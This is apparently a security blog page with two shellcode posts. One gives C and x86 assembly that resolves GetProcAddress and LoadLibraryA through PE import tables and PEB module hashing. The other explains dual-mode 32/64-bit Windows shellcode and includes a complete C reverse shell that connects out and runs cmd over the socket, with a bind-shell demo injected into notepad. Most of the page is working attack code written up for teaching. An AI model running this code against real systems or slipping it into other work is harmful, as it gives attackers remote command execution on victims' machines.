      gpa = get_imp(imp, base, (PDWORD)"GetProcAddress");
      break;
    }
  }

As before with previous GPA code, there is no bounds checking. It assumes both the API are imported from kernel32.dll

; returns    
;   ebx = pointer to LoadLibraryA    
;   ebp = pointer to GetProcAddress

    push   esi
    push   edi
    
    push   30h
    pop    edx
    
    mov    ebx, [fs:edx]     ; ebx = peb
    mov    ebx, [ebx+08h]    ; ebx = ImageBaseAddress
    add    edx, [ebx+3ch]    ; edx += e_lfanew
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                    ; OriginalFirstThunk +00h
    xchg   eax, ebp          ; store in ebp
    lodsd                    ; TimeDateStamp      +04h
    lodsd                    ; ForwarderChain     +08h
    lodsd                    ; Name               +0Ch
    xchg   eax, edx          ; store in edx
    lodsd                    ; FirstThunk         +10h 
    xchg   eax, edi          ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h    ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h    ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
    
    ; locate GetProcAddress
    mov    ecx, 'GetP'
    mov    edx, 'ddre'
    call   get_imp
    push   eax               ; save pointer 
    
    ; locate LoadLibraryA
    mov    ecx, 'Load'
    mov    edx, 'aryA'
    call   get_imp
    pop    ebp               ; ebp = GetProcAddress
    xchg   eax, ebx          ; ebx = LoadLibraryA
    
    pop    edi
    pop    esi
    ret

get_imp:
    push   esi
    push   edi
    lea    esi, [ebp+ebx]     ; esi = OriginalFirstThunk + base
    add    edi, ebx           ; edi = FirstThunk + base
gi_l0:
    lodsd                     ; eax = oft->u1.Function, oft++;
    scasd                     ; ft++;
    test   eax, eax
    js     gi_l0              ; skip ordinals 
    
    cmp    dword[eax+ebx+2], ecx
    jnz    gi_l0

    cmp    dword[eax+ebx+10], edx
    jnz    gi_l0
    
    mov    eax, [edi-4]       ; eax = ft->u1.Function
gi_l1: 
    pop    edi
    pop    esi
    ret

Extern GPA

If the executable doesn’t import GetProcAddress, we obtain it from a DLL that does.
The main difference is that we locate the DLL by hash in the PEB and then search through its imports. Here, I’m using ADVAPI32.DLL as example although you would presumably check what DLL the executable imports API from.

extern_gpa.c here

// for each DLL loaded
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && gpa == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    // hash the DLL
    dll = dte->BaseDllName.Buffer;

    for (hash=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      hash = ROTR32(hash, 13); 
      hash += dll[i] | 0x20;  
    }
    
    // is this our target DLL?
    if (hash == DLL_HASH) 
    {      
      base = dte->DllBase;
      dos  = (PIMAGE_DOS_HEADER)base;
      nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
      dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva  = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;  
      imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
  
      // locate kernel32.dll
      for (;imp->Name!=0;imp++) 
      {
        name = RVA2VA(PDWORD, base, imp->Name);
        
        if ((name[0] | 0x20202020) == 'nrek' && 
            (name[1] | 0x20202020) == '23le')
        {
          // locate GetProcAddress
          rva = imp->OriginalFirstThunk;
          oft = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
          
          rva = imp->FirstThunk;
          ft  = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
            
          for (;; oft++, ft++) 
          {
            rva = oft->u1.AddressOfData;
            if (rva==0) break;
            
            ibn = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
            name = (PDWORD)ibn->Name;
            
            // is this GetProcAddress?
            if (name[0] == 'PteG' && name[2] == 'erdd') {
              gpa = (LPVOID)ft->u1.Function;
              break;
            }
          }
        }
      }
    }
  }

The assembly code makes the following assumptions:

  1. ADVAPI32.DLL is loaded into process space and can be found in the PEB
  2. ADVAPI32.DLL imports GetProcAddress

If either of the conditions above aren’t true, this code will crash. I’m using the following macro for YASM/NASM to calculate the hash of a string and compare the result in edx.

; macro that converts string to lowercase 
%macro cmpms 1.nolist
  %assign %%h 0  
  %strlen %%len %1
  %assign %%i 1
  
  %rep %%len
    %substr %%c %1 %%i
    %assign %%h ((%%h >> 13) & 0FFFFFFFFh) | (%%h << (32-13))
    %assign %%c (%%c | 0x20)    
    %assign %%h ((%%h + %%c) & 0FFFFFFFFh)
    %assign %%i (%%i+1)
  %endrep
  ; cmp edx, hash
  db 081h, 0fah
  dd %%h
%endmacro
; returns pointer to GetProcAddress in ebp
    push   esi
    push   edi
    push   ebx
    
    push   30h
    pop    edx

    mov    esi, [fs:edx]  ; eax = (PPEB) __readfsdword(0x30);
    mov    esi, [esi+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [esi+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
gapi_l0:    
    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink    
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
gapi_l1:
    push   edx 
    movzx  ecx, word[edi+44]  ; ecx = BaseDllName.Length
    mov    esi, [edi+48]      ; esi = BaseDllName.Buffer
    shr    ecx, 1
    xor    eax, eax
    cdq
gapi_l2:
    lodsw
    or     al, 0x20
    ror    edx, 13
    add    edx, eax
    loop   gapi_l2
    ; target DLL?
    cmpms  "advapi32.dll"
    pop    edx
    jne    gapi_l0    
   
    ; we have target DLL, now search for kernel32.dll
    ; in import directory
    ; edx += IMAGE_DOS_HEADER.e_lfanew
    add    edx, [ebx+3ch]  
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
 
    ; we have it, locate GetProcAddress
    lea    esi, [ebp+ebx]
    add    edi, ebx
imp_l1:
    lodsd                   ; eax = oft->u1.Function, oft++;
    scasd                   ; ft++;
    test   eax, eax
    js     imp_l1           ; skip ordinals 
    
    cmp    dword[eax+ebx+ 2], 'GetP'
    jnz    imp_l1
    
    cmp    dword[eax+ebx+10], 'ddre'
    jnz    imp_l1
    
    mov    ebp, [edi-4]     ; ebp = ft->u1.Function
    
    pop    ebx
    pop    edi
    pop    esi
    ret

Extern LLAGPA

If the executable doesn’t import GetProcAddress and LoadLibraryA, we obtain it from a DLL that does.

extern_llagpa.c here

// for each DLL in PEB
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && gpa == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    // hash the DLL name
    dll = dte->BaseDllName.Buffer;

    for (hash=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      hash = ROTR32(hash, 13); 
      hash += dll[i] | 0x20;  
    }
    // is this the target DLL?
    if (hash == DLL_HASH)
    {
      base = dte->DllBase;
      dos  = (PIMAGE_DOS_HEADER)base;
      nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
      dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva  = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;  
      imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
    
      // locate kernel32.dll descriptor
      for (;imp->Name!=0;imp++) 
      {
        name = RVA2VA(PDWORD, base, imp->Name);
        
        if ((name[0] | 0x20202020) == 'nrek' && 
            (name[1] | 0x20202020) == '23le')
        {        
          // locate GetProcAddress and LoadLibraryA
          lla = get_imp(imp, base, (PDWORD)"LoadLibraryA");
          gpa = get_imp(imp, base, (PDWORD)"GetProcAddress");
          break;
        }
      }
    }
  }

The assembly code makes the following assumptions:

  1. ADVAPI32.DLL is loaded into process space and can be found in the PEB
  2. ADVAPI32.DLL imports GetProcAddress
  3. ADVAPI32.DLL imports LoadLibraryA
; returns    
;   ebx = pointer to LoadLibraryA    
;   ebp = pointer to GetProcAddress
    push   esi
    push   edi
    
    push   30h
    pop    edx

    mov    esi, [fs:edx]  ; eax = (PPEB) __readfsdword(0x30);
    mov    esi, [esi+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [esi+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
gapi_l0:
    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink  
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
gapi_l1:
    push   edx 
    movzx  ecx, word[edi+44]  ; ecx = BaseDllName.Length
    mov    esi, [edi+48]      ; esi = BaseDllName.Buffer
    shr    ecx, 1
    xor    eax, eax
    cdq
gapi_l2:
    lodsw
    or     al, 0x20
    ror    edx, 13
    add    edx, eax
    loop   gapi_l2
    ; target DLL?
    cmpms  "advapi32.dll"
    pop    edx
    jne    gapi_l0    
   
    ; we have target DLL, now search for kernel32.dll
    ; in import directory
    ; edx += IMAGE_DOS_HEADER.e_lfanew
    add    edx, [ebx+3ch]  
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
 
    ; locate GetProcAddress
    mov    ecx, 'GetP'
    mov    edx, 'ddre'
    call   get_imp
    push   eax               ; save pointer 
    
    ; locate LoadLibraryA
    mov    ecx, 'Load'
    mov    edx, 'aryA'
    call   get_imp
    pop    ebp               ; ebp = GetProcAddress
    xchg   eax, ebx          ; ebx = LoadLibraryA
    
    pop    edi
    pop    esi
    ret

    ; -------------
get_imp:
    push   esi
    push   edi
    lea    esi, [ebp+ebx]     ; esi = OriginalFirstThunk + base
    add    edi, ebx           ; edi = FirstThunk + base
gi_l0:
    lodsd                     ; eax = oft->u1.Function, oft++;
    scasd                     ; ft++;
    test   eax, eax
    jz     gi_l1              ; get next module if zero
    js     gi_l0              ; skip ordinals 
    
    cmp    dword[eax+ebx+2], ecx
    jnz    gi_l0

    cmp    dword[eax+ebx+10], edx
    jnz    gi_l0
    
    mov    eax, [edi-4]       ; eax = ft->u1.Function
gi_l1:
    pop    edi
    pop    esi
    ret

Summary

The current size of codes although they may shrink/expand in the future.

Type x86 Size
GPA 99
LLAGPA 127
Extern GPA 140
Extern LLAGPA 170
Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , , , , | Leave a comment

Shellcode: Dual mode PIC for x86 (Reverse and Bind Shells for Windows)

Introduction

In a nutshell, we’re mixing 32 and 64-bit x86 opcodes so that regardless of the operating system mode (legacy or long), our Position Independent Code (PIC) will still execute successfully. Although some of the code requires conditional jumps, we try avoid these where ever possible.

Writing code to run on both 32 and 64-bit windows has usually required 2 entirely different source codes. The exception was when Peter Ferrie published code to execute calc.exe in both CPU modes. Here we try extend his idea for a connect and bind shell.

Searching for API addresses in the export table uses a similar approach to Peter’s code using conditional jumps.

Because of the different calling conventions (Microsoft x64 vs stdcall) and number of parameters for each API, the actual call to an API is made from seperate pieces of code we refer to as “dispatchers”.

The resulting code is not 100% dual mode but it’s possible using a different approach to what’s shown here. The reason I don’t discuss a 100% dual mode assembly is because it requires more space.

Linux

Here’s a simple dual mode x86 shellcode for Linux just to show how easy it is. 😉

shx

Calling Conventions

32-bit Windows API use Standard Calling convention (stdcall). 64-bit Windows API use Microsoft x64 calling convention which is similar to fastcall or the AMD64 ABI used by Linux/BSD/OSX.

  • Legacy Mode (32-bit)

With stdcall, all parameters to a function are placed on the stack (normally using the PUSH instruction). Before returning to caller, the callee removes parameters (normally using RETN instruction). For cdecl convention, you’ll normally see stack fixed by caller using ADD instruction.

Registers EAX, ECX and EDX are volatile and should be presumed destroyed by function calls.

Registers EBX, ESI, EDI and EBP are non-volatile and must be saved and restored by any function that uses them.

  • Long Mode (64-bit)

The first 4 parameters are placed in RCX, RDX, R8 and R9 in that order. The remaining are placed on the stack. For MSVC compiler, the 5th and any additional parameters are normally stored in stack space using the MOV instruction so as to avoid stack misalignment. The callee does not need to alter the stack before returning.

Registers RAX, RCX, RDX, R8, R9, R10, R11 are volatile and should be presumed destroyed by function calls.

Registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are non-volatile and must be saved and restored by any function that uses them.

Mode detection

Detecting between 2 modes can be achieved using REX prefixes and the flags register, specifically status flags that can be used to make decisions, thus controlling the flow of execution.

Although both NASM and YASM assemblers provide the operand size prefix o64 which is essentially emitting 0x48 at assembly time, we don’t use that here.

flags

The x64 prefix 0x48 which is also a 32-bit opcode for ‘DEC EAX’ will affect the Sign Flag (SF) if EAX is initially zero. Setting EAX to zero first using SUB/XOR/AND will also set the Zero Flag (ZF) to 1.

Actually, even if EAX is not zero before DEC EAX, so long as the result is signed (0x80000000 and above) SF will still be 1. You can also play around with various other conditional jumps; JL/JG for example.

For this code, we’ll perform conditional jumps based on ZF and SF flags.

Jump if Not Zero (JNZ) or Jump if Zero (JZ).

If testing the result of REX prefix, we use Jump if Not Sign (JNS) or Jump if Sign (JS).

There are probably lots of ways to detect between modes so don’t limit your own code to this one approach.

Take the following code when executed in 32-bit mode.

;
    xor    eax, eax
    dec    eax
    js     x32

First, we set the Zero Flag (ZF) to 1 with XOR EAX, EAX. The CPU will then follow through with the jump to x32 because the result of ‘DEC EAX’ will set SF to 1 and ZF to 0. You could alternatively use JNZ instead of JS; both are fine. If jumping to x64 code, you can use JZ or JNS.

In 64-bit mode however, the CPU will ignore the jump because “DEC EAX” or 0x48 is of course a prefix used for 64-bit operations and so the Sign Flag (SF) is unaffected and ZF remains 1.

We need to avoid using EAX when possible. It’s typically only used in final code for detection purposes. You can also use ‘INC EAX’ to affect flags register which is what you see used in the Linux shellcode above.

Home space for 64-bit mode

When you call an API in 64-bit mode, the OS expects 32 bytes of free stack sometimes referred to as home space or Shadow Space depending on who you talk to. It will optionally save RCX, RDX, R8 and R9 here.

x64_hs

When the OS attempts to access API parameters, it will expect them at [rsp+40] or [rsp+28h] as illustrated. 32 bytes are for home space and 8 for return address.

Stack and Structure alignment

For 64-bit mode, the stack must be aligned by 16 bytes minus 8 before calling an API so that SSE2 instructions execute without causing exceptions. It should be 16 minus 8 because once our call to an API is made, the return address will occupy 8 bytes, thus aligning the stack by 16.

Since we’re dealing with both stdcall and Microsoft x64 calling conventions, I’ve opted to push all parameters on the stack and then use a separate piece of code for 64-bit mode.

Structures for 64-bit code obviously have to be aligned by 8 bytes. Although the assembly code does not define any structures, it’s important to know the offset of each field in a structure for both 32 and 64-bit mode.

STARTUPINFO for example defines 2 WORD values (wShowWindow and cbReserved2) which are aligned by 8 as you can see by offset of the lpReserved2 field.

typedef struct _STARTUPINFOA {
    DWORD   cb;              //  +0 or  +0
    LPSTR   lpReserved;      //  +4 or  +8
    LPSTR   lpDesktop;       //  +8 or +16
    LPSTR   lpTitle;         // +12 or +24
    DWORD   dwX;             // +16 or +32
    DWORD   dwY;             // +20 or +36
    DWORD   dwXSize;         // +24 or +40
    DWORD   dwYSize;         // +28 or +44
    DWORD   dwXCountChars;   // +32 or +48
    DWORD   dwYCountChars;   // +36 or +52
    DWORD   dwFillAttribute; // +40 or +56
    DWORD   dwFlags;         // +44 or +60
    WORD    wShowWindow;     // +48 or +64
    WORD    cbReserved2;     // +50 or +66  <-- alignment adds 4 
    LPBYTE  lpReserved2;     // +52 or +72
    HANDLE  hStdInput;       // +56 or +80
    HANDLE  hStdOutput;      // +60 or +88
    HANDLE  hStdError;       // +64 or +96
} STARTUPINFOA, *LPSTARTUPINFOA;

Resolving and executing API

For those of you unfamiliar with this process, please refer to Resolving API addresses in memory.

Although I’ve followed the same idea in this code here where API hashes and additional parameters are accessed through ESI, I may not use this in future. The function to call an API is stored in EBP.

An additional parameter count is stored before the API hash for the x64 dispatcher when pop’ing arguments into RCX, RDX, R8 and R9. We also have to release arguments on the stack after call since Microsoft x64 does not do this but stdcall does.

Here’s what the 32-bit source in x84.asm looks like when working with the PE Export Directory.

x84_asm

Now look at both disassemblies for each mode, first 32-bit which is essentially same as source above.

x32_dis

Then 64-bit

x64_dis

The ‘DEC EAX’ simply turns some opcodes into 64-bit operations when running under 64-bit mode but still works fine under 32-bit mode provided we avoid using EAX as much as possible.

When writing dual mode assembly like this, just imagine EAX doesn’t really exist as a general purpose register and ‘DEC EAX’ is merely an instruction to tell CPU you want the next operation to be 64-bit.

Advancing buffer by 4 or 8 bytes

As you can see from the STARTUPINFO structure above, some data types are 64-bit. When assigning our socket handle to hStdInput, hStdOutput and hStdError, we need to advance the buffer position by 8 bytes.

But in 32-bit mode, we only need to advance 4 so we can of course use conditional jumps for this but instead, we store the socket handle in EBX/RBX, the pointer to memory in EDI/RDI and then use a prefix before SCASD which then adds 4 or 8 depending on CPU mode.

Since we need to avoid using EAX, we can’t use STOSQ which would have DEC EAX prefixed to regular STOSD instruction.

;
    mov    cl, 3
rc_l6x:    
    mov    [edi], ebx  ; si.hStdInput  = s
    dec    eax         ; advance 4 or 8 depending on mode
    scasd
    loop   rc_l6x
//
  /* 01AE */ "\xb1\x03"    /* mov cl, 0x3         */
  /* 01B0 */ "\x89\x1f"    /* mov [rdi], ebx      */
  /* 01B2 */ "\x48\xaf"    /* scasq               */
  /* 01B4 */ "\xe2\xfa"    /* loop 0x1b0          */

The potential problem with this might be if a socket handle returned by WSASocketA occupies more than 32-bits on a 64-bit system.

Reverse shell

So finally here’s a snippet of C code for a simple reverse shell on windows that performs no error checking. Compile this with MSVC or MINGW and use NETCAT or the more advanced NCAT to setup a TCP listener on localhost:1234.

//
  PROCESS_INFORMATION pi;
  STARTUPINFO         si;
  WSADATA             wsa;
  SOCKET              s;
  struct sockaddr_in  sa;
  u_long              ip;
    
  WSAStartup (MAKEWORD(2, 0), &wsa);
  
  s=WSASocket (AF_INET, SOCK_STREAM, 
      IPPROTO_IP, NULL, 0, 0);

  ip = inet_addr ("127.0.0.1"); 
    
  sa.sin_family = AF_INET;
  sa.sin_port   = htons(1234);
  
  memcpy ((void*)&sa.sin_addr, 
      (void*)&ip, sizeof(ip));
    
  connect(s, (struct sockaddr*)&sa, sizeof(sa));

  memset ((void*)&si, 0, sizeof(si));

  si.cb         = sizeof(si);
  si.dwFlags    = STARTF_USESTDHANDLES;
  si.hStdInput  = (HANDLE)s;
  si.hStdOutput = (HANDLE)s;
  si.hStdError  = (HANDLE)s;

  CreateProcess (NULL, "cmd", NULL, NULL, 
    TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);

  WaitForSingleObject (pi.hProcess, INFINITE);
  
  CloseHandle(pi.hProcess);
  CloseHandle(pi.hThread);
  
  closesocket (s);

Demonstration

You can run a demo using Process Injector tool included.

Here’s a screenshot of Windows NT 4.0 running the bind shell running inside notepad.

bind_nt

And here’s me connecting with ncat.

winnt

Summary

The most difficult part of writing code like this is dealing with the different calling conventions.

An exercise left up to the reader would be writing something that entirely avoids using x64 registers which are used in the x64 dispatcher here.

See source codes here for both bind/reverse shells and any future updates.

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | 1 Comment